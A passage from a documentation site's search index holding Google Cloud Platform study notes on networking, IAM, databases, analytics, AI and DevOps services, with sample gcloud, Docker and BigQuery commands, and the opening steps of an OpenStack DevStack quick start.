• Associate this backend with the health check created earlier. This health check will be a checkpoint for the load balancer to decide whether to route the traffic to the instance or not. If the health check fails for one of the instances, the load balancer will gracefully send the request to the other instance, which enhances the user experience because users only see output coming from healthy instances.
• The second step is setting up host and path rules; since there are not multiple endpoints, leave that as the default.

                                  • Third step, Front end configuration. The front end is basically how the consumer or the client of your application sees the endpoint. Configure it:
                                    • Provide a name.
                                    • Protocol is HTTP.
                                    • Premium, this is the network service there.
                                    • IPv4, it's an ephemeral IP address.
                                  • Fourth step, review settings.

In about five minutes, the load balancer will be completely functioning, which means it will be able to route the traffic to one of the instances in the backend group, which is based on the instance template that we created. By accessing the load balancer's IP on port 80, you will be directed each time to a different machine.
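The same template and managed instance group can also be created from the command line; a gcloud sketch, with the names, zone, and the startup script file (saved as startup.sh) as placeholders:

```
# Instance template using the startup script from the walkthrough
gcloud compute instance-templates create web-template \
  --machine-type=e2-small \
  --tags=http-server \
  --metadata-from-file=startup-script=startup.sh

# Managed instance group of two VMs based on that template
gcloud compute instance-groups managed create web-group \
  --template=web-template \
  --size=2 \
  --zone=us-central1-a
```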

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#42-virtual-private-cloud-vpc","title":"4.2. Virtual Private Cloud (VPC)","text":"
                                  • VPC is a software defined network providing private networking for VMs.
                                  • VPC network is a global resource with regional subnets.
                                  • Each VPC is logically isolated from each other.
                                  • Firewall rules allow or restrict traffic within subnets. Default option is deny.
• Resources within a VPC communicate via IPv4 addresses, and there is a DNS service within the VPC that provides name resolution.
                                  • VPC networks can be connected to other VPC networks through VPC peering.
                                  • VPC networks are securely connected in hybrid environments using Cloud VPN or Cloud Interconnect.
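A minimal sketch of these pieces with the gcloud CLI (network, subnet, and rule names are hypothetical):

# Custom-mode VPC with one regional subnet
gcloud compute networks create demo-vpc --subnet-mode=custom
gcloud compute networks subnets create demo-subnet \
  --network=demo-vpc --region=us-central1 --range=10.0.0.0/24

# Firewall rule allowing HTTP into the network (traffic is denied by default)
gcloud compute firewall-rules create demo-allow-http \
  --network=demo-vpc --allow=tcp:80

# VPC peering to another network
gcloud compute networks peerings create demo-peering \
  --network=demo-vpc --peer-network=other-vpc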
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#43-hybrid-connectivity","title":"4.3. Hybrid Connectivity","text":"
                                  • Hybrid connectivity extends local data center to GCP.
                                  • Three GCP services enable hybrid connectivity:
                                    • Cloud Interconnect: Cloud Interconnect extends on-premises network to GCP via Dedicated or Partner Interconnect.
                                    • Cloud VPN: Cloud VPN connects on-premises environment to GCP securely over the internet through IPSec VPN.
• Peering: Peering enables direct access to Google Cloud resources with reduced Internet egress fees.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#5-identity-access-management","title":"5. Identity & Access Management","text":"
• IAM controls access by defining who (identity) has what access (role) for which resource. Members (who), roles (what), and permissions (which).
                                  • Cloud IAM is based on the principle of least privilege.
                                  • An IAM policy binds identity to roles which contains permissions.

                                  Where do you use IAM?

• To share GCP resources with fine-grained control.
• Selectively allow/deny permissions to individual resources.
• Define custom roles that are specific to a team/organization.
• Enable authentication of applications through service accounts.
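A minimal sketch of such a binding with the gcloud CLI (the project ID, user email, and role are placeholders):

# Grant the Pub/Sub Publisher role to a user on a project
gcloud projects add-iam-policy-binding my-project-id \
  --member="user:alice@example.com" \
  --role="roles/pubsub.publisher"

# Inspect the resulting IAM policy
gcloud projects get-iam-policy my-project-id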

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#51-cloud-iam-identity","title":"5.1. Cloud IAM Identity","text":"

A Google account is a Cloud IAM user, so anyone with a Gmail or Google account can be a Cloud IAM member.

                                  A Service account is a special type of user. It's meant for applications to talk to GCP resources.

                                  A Google group is also a valid user or a member in Cloud IAM because it represents a logical entity that is a collection of users.

                                  A G Suite domain like yourorganization.com is also a valid user or a member. You can assign permissions to an entire G Suite domain.

                                  If you are not part of google, you can use Cloud Identity Service to create a Cloud identity domain, that is also a valid Cloud IAM user.

                                  And \"allAuthenticatedUsers\" is also an entity that allows you to assign permissions to all users authenticated through Google's authentication system.

                                  Last, \"allUsers\" assigns permissions even to anonymous users.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#52-cloud-iam-permissions","title":"5.2. Cloud IAM Permissions","text":"
• Permissions determine the operations that can be performed on a resource (launch an instance, upload an object to a storage bucket, ...).
                                  • Correspond 1:1 with REST methods of GCP resources. GCP is based on a collection of APIs.
                                  • Each GCP resource exposes REST APIs to perform operations.
                                  • Permissions are directly mapped to each REST API.
                                    • Publisher.Publish() -> pubsub.topics.publish.
• Permissions cannot be assigned directly to members/users, only to a role. You group multiple permissions into a role and assign that role to a member.
• One or more permissions are assigned to an IAM role.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#53-cloud-iam-roles","title":"5.3. Cloud IAM Roles","text":"

                                  Roles are a logical grouping of permissions.

                                  • Primitive roles:
• Owner: unlimited access to a resource.
• Editor: view and modify access.
• Viewer: read-only access.
                                  • Predefined roles that associate a set of operations typically associated to objects. Every object in GCP has a set of predefined roles:
                                    • roles/pubsub.publisher
                                    • roles/compute.admin
                                    • roles/storage.objectAdmin
                                  • Custom roles:
• An assorted collection of permissions.
                                    • Fine-grained access to resources.
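A minimal sketch of creating a custom role with the gcloud CLI (the role ID, title, and permission set are illustrative):

# Custom role grouping a hand-picked set of permissions
gcloud iam roles create instanceViewer \
  --project=my-project-id \
  --title="Instance Viewer" \
  --permissions=compute.instances.get,compute.instances.list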
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#54-key-elements-of-cloud-iam","title":"5.4. Key Elements of Cloud IAM","text":"
• Resource – Any GCP resource
                                    • Projects
                                    • Cloud Storage Buckets
                                    • Compute Engine Instances
                                    • ...
                                  • Permissions - Determines operations allowed on a resource
                                    • Syntax for calling permissions:
<service>.<resource>.<verb>
    - pubsub.subscriptions.consume
    - compute.instances.insert
• Roles – A collection of permissions

  • compute.instanceAdmin
    • compute.instances.start
    • compute.instances.stop
    • compute.instances.delete
    • …
• Users – Represents an identity

  • Google Account
  • Google Group
  • G Suite Domain
  • …
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#55-service-accounts","title":"5.5. Service Accounts","text":"
• A special Google account that belongs to an application or VM. It doesn't represent a user or human identity.
• A service account is identified by a unique email address assigned by GCP; you don't have control over it, as it's automatically created by GCP.
• Service accounts are associated with key pairs used for authentication. This key is the credential that identifies the application.
                                  • Two types of service accounts:
                                    • User managed, which can be associated with a role.
                                    • Google managed.
                                  • Each service account is associated with one or more roles.
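A minimal sketch with the gcloud CLI (the account name and project ID are placeholders; GCP assigns the email of the form <name>@<project-id>.iam.gserviceaccount.com):

# Create a user-managed service account
gcloud iam service-accounts create app-runner \
  --display-name="App runner"

# Bind a role to the service account at the project level
gcloud projects add-iam-policy-binding my-project-id \
  --member="serviceAccount:app-runner@my-project-id.iam.gserviceaccount.com" \
  --role="roles/storage.objectAdmin"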
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#6-database-services","title":"6. Database Services","text":"
                                  • GCP has managed relational and NoSQL database services.
                                  • Traditional web and line-of-business apps may use RDBMS.
                                  • Modern applications rely on NoSQL databases.
• Web-scale, distributed applications need multi-region databases.
• In-memory databases are used to accelerate application performance.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#61-google-cloud-sql","title":"6.1. Google Cloud SQL","text":"
                                  • One of the most common services in GCP.
• Fully managed RDBMS service that simplifies setting up, maintaining, managing, and administering database instances.
• Cloud SQL supports three types of RDBMS (Relational DataBase Management Systems):
                                    • MySQL
                                    • PostgreSQL
                                    • Microsoft SQL Server (Preview)
                                  • A managed alternative to running RDBMS in VMs.
                                  • Cloud SQL delivers scalability, availability, security, and reliability of database instances.
                                  • Cloud SQL instances may be launched within VPC for additional security.
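As a minimal sketch, launching a managed PostgreSQL instance with the gcloud CLI (the instance name, tier, and region are illustrative):

# Create a small managed PostgreSQL instance
gcloud sql instances create demo-db \
  --database-version=POSTGRES_14 \
  --tier=db-f1-micro \
  --region=us-central1

# Set the password for the default postgres user
gcloud sql users set-password postgres \
  --instance=demo-db --password=change-me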
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#62-google-clod-bigtable","title":"6.2. Google Clod Bigtable","text":"
                                  • Petabyte-scale, managed NoSQL database service.
                                  • Sparsely populated table that can scale to billions of rows and thousands of columns.
                                  • Storage engine for large-scale, low-latency applications.
                                  • Ideal for throughput-intensive data processing and analytics.
                                  • An alternative to running Apache HBase column-oriented database in VMs.
                                  • Acts as a storage engine for MapReduce operations, stream processing, and machine-learning applications
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#63-google-cloud-spanner","title":"6.3. Google Cloud Spanner","text":"
                                  • Managed, scalable, relational database service for regional and global application data.
                                  • Scales horizontally across rows, regions, and continents.
                                  • Brings best of relational and NoSQL databases.
                                  • Supports ACID transactions and ANSI SQL queries.
                                  • Data is replicated synchronously with globally strong consistency.
• Cloud Spanner replicas come in three types:
                                    • Read-write
                                    • Read-only
                                    • Witness
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#64-google-cloud-memorystore","title":"6.4. Google Cloud Memorystore","text":"
                                  • A fully-managed in-memory data store service for Redis.
• Ideal for application caches that provide sub-millisecond data access.
                                  • Cloud Memorystore can support instances up to 300 GB and network throughput of 12 Gbps.
                                  • Fully compatible with Redis protocol.
                                  • Promises 99.9% availability with automatic failover.
                                  • Integrated with Stackdriver for monitoring.
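A minimal sketch with the gcloud CLI (the instance name, size, and region are illustrative):

# Create a 1 GB Redis instance in a region
gcloud redis instances create demo-cache \
  --size=1 --region=us-central1 --redis-version=redis_6_x

# Retrieve its host/port to point Redis clients at it
gcloud redis instances describe demo-cache --region=us-central1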
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#7-data-and-analytics-services","title":"7. Data and Analytics Services","text":"
• Data analytics includes ingesting, collecting, processing, analyzing, and visualizing data.
                                  • GCP has a comprehensive set of analytics services.
                                  • Cloud Pub/Sub is typically used for ingesting data at scale, whether it is telemetry data coming from sensors or logs coming from your applications and infrastructure.
                                  • Cloud Dataflow can process data in real-time or batch mode.
• Cloud Dataproc is a Big Data service for running Hadoop and Spark jobs. These are typically MapReduce jobs over the large datasets that form big data stores with historical data, or data stored in traditional databases.
• BigQuery is the data warehouse in the cloud. Many Google Cloud customers rely on BigQuery for analyzing historical data and deriving insights from it.
• Cloud Datalab is used for analyzing and visualizing data.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#71-google-cloud-pub-sub","title":"7.1. Google Cloud Pub / Sub","text":"
                                  • Managed service to ingest data at scale.
• Based on the publish/subscribe pattern: a set of publishers send messages to a topic, a set of subscribers subscribe to that topic, and Pub/Sub provides the infrastructure for publishers and subscribers to reliably exchange messages.
                                  • Global entry point to GCP-based analytics services.
                                  • Acts as a simple and reliable staging location for data. Pub/Sub is not meant to be a durable data store.
                                  • Tightly integrated with services such as Cloud Storage and Cloud Dataflow.
• Supports at-least-once delivery with synchronous, cross-zone message replication. What this means is that you get a highly reliable delivery mechanism, with redundancy because of cross-zone message replication. You don't lose messages when they are sent via the Cloud Pub/Sub infrastructure.
                                  • Comes with end-to-end encryption, IAM, and audit logging.
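A minimal sketch of the pattern with the gcloud CLI (topic and subscription names are placeholders):

# Create a topic and a pull subscription attached to it
gcloud pubsub topics create demo-topic
gcloud pubsub subscriptions create demo-sub --topic=demo-topic

# Publish a message, then pull and acknowledge it
gcloud pubsub topics publish demo-topic --message="hello"
gcloud pubsub subscriptions pull demo-sub --auto-ack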
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#72-google-cloud-dataflow","title":"7.2. Google Cloud Dataflow","text":"
                                  • Managed service for transforming and enhancing data in stream and batch modes: Cloud Dataflow is meant for transforming and enhancing data, either coming via real-time streams or data stored in Cloud Storage, which is processed in batch mode.
• Based on the Apache Beam open source project: Google is one of the key contributors to Apache Beam, and Cloud Dataflow is a commercial implementation of it.
                                  • Serverless approach automates provisioning and management: With serverless infrastructure and serverless computing, you don't need to provision resources and scale them manually. Instead, you start streaming the data and connecting that to Dataflow, maybe via Pub/Sub. And it can automatically start processing the data and scales the infrastructure based on the inbound data stream.
                                  • Inbound data can be queried, processed, and extracted for target environment.
                                  • Tightly integrated with Cloud Pub/Sub, BigQuery, and Cloud Machine Learning.
                                  • Cloud Dataflow connector for Kafka makes it easy to integrate Apache Kafka.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#73-google-cloud-dataproc","title":"7.3. Google Cloud Dataproc","text":"
                                  • Managed Apache Hadoop and Apache Spark cluster environments.
                                  • Automated cluster management.
• Clusters can be quickly created and resized from three to hundreds of nodes.
• Move existing Big Data projects to GCP without redevelopment.
• Frequent updates to Spark, Hadoop, Pig, Hive, and other components of the Apache ecosystem.
• Integrates with other GCP services like Cloud Dataflow and BigQuery.

In a typical Dataproc pipeline, data enters through Pub/Sub, gets transformed through Dataflow, and gets processed with Dataproc, usually in the form of a MapReduce job written for Apache Hadoop or Apache Spark. The output of Dataproc can be stored in BigQuery, or it can go to Google Cloud Storage.
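A sketch of the cluster side with the gcloud CLI (the cluster name and region are illustrative; the SparkPi example jar ships with Dataproc images):

# Create a small Dataproc cluster
gcloud dataproc clusters create demo-cluster \
  --region=us-central1 --num-workers=2

# Submit a Spark job to it (SparkPi from the bundled examples)
gcloud dataproc jobs submit spark \
  --cluster=demo-cluster --region=us-central1 \
  --class=org.apache.spark.examples.SparkPi \
  --jars=file:///usr/lib/spark/examples/jars/spark-examples.jar \
  -- 1000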

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#74-google-cloud-datalab","title":"7.4. Google Cloud DataLab","text":"
                                  • Interactive tool for data exploration, analysis, visualization, and machine learning.
                                  • Runs on Compute Engine and may connect to multiple cloud services.
                                  • Built on open source Jupyter Notebooks platform.
• Enables analysis of data coming from BigQuery, Cloud ML Engine, and Cloud Storage.
                                  • Supports Python, SQL, and JavaScript languages.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#75-bigquery","title":"7.5. BigQuery","text":"
• Serverless, scalable cloud data warehouse: Google BigQuery is one of the early analytics services added to GCP. It's a very powerful, very popular service used by enterprise customers to analyze data.
• Has an in-memory BI Engine and machine learning built in, so as you query data from BigQuery you can apply machine learning algorithms that perform predictive analytics right out of the box.
• Supports the standard ANSI:2011 SQL dialect for querying. You don't need to learn new or domain-specific languages to deal with BigQuery. You can use familiar SQL queries that support inner joins, outer joins, GROUP BY and WHERE clauses to extract and analyze data from existing data stores.
• Federated queries can process external data sources. BigQuery can pull the data from all of these sources and perform one single query that automatically joins and groups, so you get a unified view of the dataset:
                                    • Cloud Storage.
                                    • Cloud Bigtable.
                                    • Spreadsheets (Google Drive).
                                  • Automatically replicates data to keep a seven-day history of changes.
                                  • Supports data integration tools like Informatica and Talend.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#case-use","title":"Case use","text":"

                                  Open BigQuery and open a public dataset. Select Stack Overflow. We will try to extract the number of users in Stack Overflow with gold badges and how many days it took them to get there.

# Run the below SQL statement in BigQuery

SELECT badge_name AS First_Gold_Badge,
       COUNT(1) AS Num_Users,
       ROUND(AVG(tenure_in_days)) AS Avg_Num_Days
FROM
(
  SELECT
    badges.user_id AS user_id,
    badges.name AS badge_name,
    TIMESTAMP_DIFF(badges.date, users.creation_date, DAY) AS tenure_in_days,
    ROW_NUMBER() OVER (PARTITION BY badges.user_id
                       ORDER BY badges.date) AS row_number
  FROM
    `bigquery-public-data.stackoverflow.badges` badges
  JOIN
    `bigquery-public-data.stackoverflow.users` users
  ON badges.user_id = users.id
  WHERE badges.class = 1
)
WHERE row_number = 1
GROUP BY First_Gold_Badge
ORDER BY Num_Users DESC
LIMIT 10
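The same public dataset can also be queried from Cloud Shell with the bq CLI instead of the console; a minimal sketch with a simpler, illustrative query:

# Run a standard-SQL query against the public dataset from the CLI
bq query --use_legacy_sql=false \
  'SELECT COUNT(1) FROM `bigquery-public-data.stackoverflow.badges` WHERE class = 1'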

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#8-ai-and-ml-services","title":"8. AI and ML Services","text":"
                                  • AI Building Blocks provide AI through simple REST API calls.
                                  • Cloud AutoML enables training models on custom datasets.
                                  • AI Platform provides end-to-end ML pipelines on-premises and cloud.
                                  • AI Hub is a Google hosted repository to discover, share, and deploy ML models.
                                  • Google Cloud Platform offers comprehensive set of ML & AI services for beginners and advanced AI engineers.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#81-ai-building-blocks","title":"8.1. AI Building Blocks","text":"

GCP AI building blocks expose a set of APIs that can deliver AI capabilities without training models or writing complex code. The GCP AI building blocks are structured into:

• Sight, which delivers vision- and video-based intelligence.
• Conversation, which is all about text-to-speech and speech-to-text. It also includes Dialogflow, which powers some of the capabilities we see in Google Home, Google Assistant, and other conversational user experiences.
• Language, which is all about translation, and natural language, which deals with revealing the structure and meaning of text through machine learning.
• Structured data, which can be used to perform regression, classification, and prediction.
• AutoML Tables, a service meant for performing regression or classification on your structured data.
• Recommendations AI, which delivers personalized product recommendations at scale.
• Cloud Inference API, which is all about running large-scale correlations over time series datasets.

So, these are all capabilities that can be used directly by consuming the APIs. For example, within Vision you can perform object detection or image classification by simply uploading or sending the image to the API: it comes back with all the objects detected within that image, or it can classify the images given as input. Similarly, when you send text to the Text-to-Speech API, it comes back with an audio file that speaks out the text that was sent. These AI building blocks are very useful for infusing AI and intelligence into your applications.
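As a minimal sketch, calling the Vision API for label detection with curl (the API key and the image URI are placeholders):

# Label detection via the REST API; $API_KEY and the image URI are placeholders
curl -s -X POST \
  "https://vision.googleapis.com/v1/images:annotate?key=$API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "requests": [{
      "image": {"source": {"imageUri": "gs://my-bucket/photo.jpg"}},
      "features": [{"type": "LABEL_DETECTION", "maxResults": 5}]
    }]
  }'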

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#82-automl","title":"8.2. AutoML","text":"
• Cloud AutoML enables training high-quality models specific to a business problem. What if you want to train a custom model but do not want to write complex code about artificial neural networks? That's where Google Cloud AutoML comes into the picture.
                                  • Custom machine learning models without writing code.
                                  • Based on Google\u2019s state-of-the-art machine learning algorithms.
                                  • AutoML Services.
                                    • Sight.
                                      • Vision.
                                      • Video Intelligence.
                                    • Language.
                                      • Natural Language.
                                      • Translation.
• Structured Data.
                                      • Tabular data.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#83-ai-platform","title":"8.3. AI Platform","text":"
                                  • Covers the entire spectrum of machine learning pipelines.
                                  • Built on Kubeflow, an open source ML project based on Kubernetes.
                                  • Includes tools for data preparation, training, and inference

Just like a data processing pipeline, an ML processing pipeline is a comprehensive set of stages combined into a pipeline, and Kubeflow is a project that simplifies the process of creating these pipelines. A typical Kubeflow pipeline combines phases such as data preparation, training, and inference.

Google AI Platform gives us scalable infrastructure and a framework to deal with this pipeline and its multiple stages. Google AI Platform is not confined to the cloud: customers running on-premises Kubernetes infrastructure can deploy AI Platform on-prem, and it can be seamlessly extended to the cloud, which means they can train on-prem but deploy in the cloud, or train in the cloud but deploy the models on-prem. Kubeflow is the underlying framework and infrastructure that supports the entire processing pipeline, whether on-prem or in the public cloud.

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#84-ai-hub","title":"8.4. AI Hub","text":"
                                  • Hosted repository of plug-and-play AI components.
                                  • Makes it easy for data scientists and teams to collaborate.
                                  • AI Hub can host private and public content.
• AI Hub includes:
                                    • Kubeflow Pipeline components.
                                    • Jupyter Notebooks.
• TensorFlow modules.
• VM Images.
                                    • Trained models.
                                    • \u2026
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#9-devops-services","title":"9. Devops Services","text":"
                                  • DevOps Services provide tools and frameworks for automation.
                                  • Cloud Source Repositories store and track source code.
                                  • Cloud Build automates continuous integration and deployment.
                                  • Container Registry acts as the central repository for storing, securing, and managing Docker container images.
                                  • IDE and tools integration enables developer productivity.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#91-google-cloud-source-repositories","title":"9.1. Google Cloud Source Repositories","text":"
                                  • Acts as a scalable, private Git repository.
• Extends the standard Git workflow to Cloud Build, Cloud Pub/Sub and Compute services: the advantage of using Google Cloud Source Repositories is keeping the source code very close to your deployment target. That could be Compute Engine, App Engine, Cloud Functions, or Kubernetes Engine.
                                  • Unlimited private Git repositories that can mirror code from Github and Bitbucket repos.
                                  • Triggers to automatically build, test, and deploy code.
                                  • Integrated regular expression-based code search.
                                  • Single source of code for deployments across GCE, GAE, GKE, and Functions.

You should consider Cloud Source Repositories when you want to manage the life cycle of an application within GCP, all the way from storing the code to deploying and iterating over your code multiple times.
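A minimal sketch with the gcloud CLI (the repo name is a placeholder):

# Create a private Git repository in the current project and clone it
gcloud source repos create demo-repo
gcloud source repos clone demo-repo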

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#92-google-cloud-build","title":"9.2. Google Cloud Build","text":"
                                  • Managed service for source code build management.
• The CI/CD tool of Google Cloud Platform: Google Cloud Build is the CI/CD tool for building the code that is stored either in Cloud Source Repositories or in an external Git repository.
                                  • Supports building software written in any language.
                                  • Custom workflow to deploy across multiple target environments.
                                  • Tight integration with Cloud Source Repo, GitHub, and Bitbucket, which is going to be the source for your code repositories and they act as the initial phase for triggering the entire CI/CD pipeline.
                                  • Supports native Docker integration with automated deployment to Kubernetes and GKE.
                                  • Identifies vulnerabilities through efficient OS package scanning: Apart from packaging and deploying source code, the service can also identify vulnerabilities through efficient OS package scanning.

Google Cloud Build takes the source code stored either in a GCP source repo or in Bitbucket, GitLab, or GitHub, and creates the integration and deployment pipeline.
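A minimal sketch of triggering a build from Cloud Shell (the image name is a placeholder):

# Build the container image from the current directory and push it
# to Container Registry in one step
gcloud builds submit --tag gcr.io/$PROJECT_ID/my-app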

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#93-google-container-registry","title":"9.3. Google Container Registry","text":"

Google Cloud Source Repositories stores your source code, while Cloud Build is responsible for building and packaging your applications. Container Registry stores the Docker images and artifacts in a centralized registry.

                                  • Single location to manage container images and repositories.
                                  • Store images close to GCE, GKE, and Kubernetes clusters: Because the Container Registry is co-located with Compute it is going to be extremely fast.
                                  • Secure, private, scalable Docker registry within GCP.
                                  • Supports RBAC to access, view, and download images.
• Detects vulnerabilities in early stages of the software deployment.
                                  • Supports automatic lock-down of vulnerable container images.
                                  • Automated container build process based on code or tag changes.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#use-case-adding-an-image-to-gcp-container-registry","title":"Use case: adding an image to GCP Container Registry","text":"

In the GCP Dashboard go to Container Registry. The first time, it will be empty.

# Run the below commands in Google Cloud Shell
gcloud services enable containerregistry.googleapis.com

export PROJECT_ID=<PROJECT ID> # Replace this with your GCP Project ID

docker pull busybox
docker images
cat <<EOF >>Dockerfile
FROM busybox:latest
CMD ["date"]
EOF
docker build . -t mybusybox

# Tag your image with the convention stated by GCP
docker tag mybusybox gcr.io/$PROJECT_ID/mybusybox:latest
# When listing images with docker images, you will see it renamed.

# Run your image
docker run gcr.io/$PROJECT_ID/mybusybox:latest

# Wire the credentials of GCP Container Registry with Docker
gcloud auth configure-docker

# Take our mybusybox image available in the environment and push it to the Container Registry.
docker push gcr.io/$PROJECT_ID/mybusybox:latest
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#94-devel-tools-integration","title":"9.4. Devel Tools Integration","text":"
                                  • IDE plugins for popular development tools.
                                    • IntelliJ.
                                    • Visual Studio.
                                    • Eclipse.
                                  • Tight integration between IDEs and managed SCM, build services.
                                  • Automates generating configuration files and deployment scripts.
                                  • Makes GCP libraries and SDKs available within the IDEs.
                                  • Enhances developer productivity
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#10-other-gcp-services","title":"10. Other GCP services","text":"","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#101-iot-services","title":"10.1. IoT Services","text":"

                                  GCP IoT has two essential services.

• Cloud IoT Core: Cloud IoT Core provides machine-to-machine communication, a device registry, and overall device management capabilities. If you have multiple sensors, actuators, and devices that need to be connected to the cloud, you would use IoT Core. IoT Core provides authentication and authorization of devices, enables machines to talk to each other, and lets you manage the entire life cycle of devices. Tightly integrated with Cloud Pub/Sub and Cloud Functions.
• Edge TPU: hardware that accelerates AI models running at the edge. An edge device can run business logic and even artificial intelligence models in offline mode, and the Edge TPU plays the role of a small TPU/GPU attached to such devices. When you run a TensorFlow model on a device powered by an Edge TPU, inference (the process of performing classification, detection, or prediction) is much faster. The Edge TPU is available as a chip that can be attached to an edge device like a Raspberry Pi or an x86 device.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#102-api-management","title":"10.2. API Management","text":"
• Apigee API Platform provides the capabilities for designing, securing, publishing, analyzing, and monitoring APIs. Developers can benefit from using the Apigee API Platform for managing the end-to-end life cycle of APIs.
                                  • API Analytics: API analytics provide end-to-end visibility across API programs with developer engagement and business metrics.
• Cloud Endpoints is a service meant to develop, deploy, and manage APIs in the Google Cloud environment. It is based on an Nginx-based proxy and uses the OpenAPI Specification as the API framework. Cloud Endpoints gives developers the tools they need to manage the entire API development life cycle, from the beginning through deployment and maintenance, with tight integration.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#103-hybrid-and-multicloud-services","title":"10.3. Hybrid and Multicloud Services","text":"
                                  • Traffic Director routes the traffic across virtual machines and containers deployed across multiple regions.
                                  • Stackdriver is the observability platform for tracing, debugging, logging, and gaining insights into application performance and infrastructure monitoring.
                                  • GKE On-Prem takes Google Kubernetes engine and runs that within the local data center environment or on-premises.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#104-anthos","title":"10.4. Anthos","text":"
• Anthos is Google's multi-cloud and hybrid cloud platform based on Kubernetes and GKE.
• Anthos enables managed Kubernetes service (GKE) in a variety of environments. Anthos enables customers to run and take control of multiple Kubernetes clusters deployed through GKE and run them in other cloud environments.
                                  • Anthos can be deployed in:
                                    • Google Cloud
                                    • vSphere (on-premises)
                                    • Amazon Web Services
                                    • Microsoft Azure
                                  • Non-GKE Kubernetes clusters can be attached to Anthos: Apart from launching and managing Kubernetes clusters through Anthos, you can also onboard and register clusters that were created outside of Anthos.
                                  • Delivers centralized management and operations for Kubernetes clusters running diverse environments.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#105-migration-tools","title":"10.5. Migration Tools","text":"
                                  • Transfer Appliance provides bulk data transfer from your data center to the cloud based on a physical appliance.
• Migrate for Compute Engine is based on a tool called Velostrata that Google acquired in 2018, and it provides the capability of migrating existing virtual machines or even physical machines into GCE VMs.
• BigQuery Data Transfer Service is a tool to run scheduled uploads from third-party SaaS tools and platforms into the BigQuery data platform.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/openstasck/openstack-essentials/","title":"Openstack Essentials","text":"

OpenStack is a set of open source software tools for building and managing cloud computing platforms for public and private clouds. Go to the official documentation.

It can be managed from a web dashboard, command-line tools, and RESTful web services.

                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#overview-of-openstack-services","title":"Overview of OpenStack services","text":"","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#quick-start","title":"Quick Start","text":"

                                  Follow instructions from: https://docs.openstack.org/devstack/latest/

                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#1-install-linux","title":"1. Install Linux","text":"

                                  Start with a clean and minimal install of a Linux system. DevStack attempts to support the two latest LTS releases of Ubuntu, Rocky Linux 9 and openEuler.

                                  If you do not have a preference, Ubuntu 22.04 (Jammy) is the most tested, and will probably go the smoothest.

                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#2-add-stack-user-optional","title":"2. Add Stack User (optional)","text":"

DevStack should be run as a non-root user with sudo enabled (standard logins to cloud images such as "ubuntu" or "cloud-user" are usually fine).

If you are not using a cloud image, you can create a separate stack user to run DevStack with:

sudo useradd -s /bin/bash -d /opt/stack -m stack

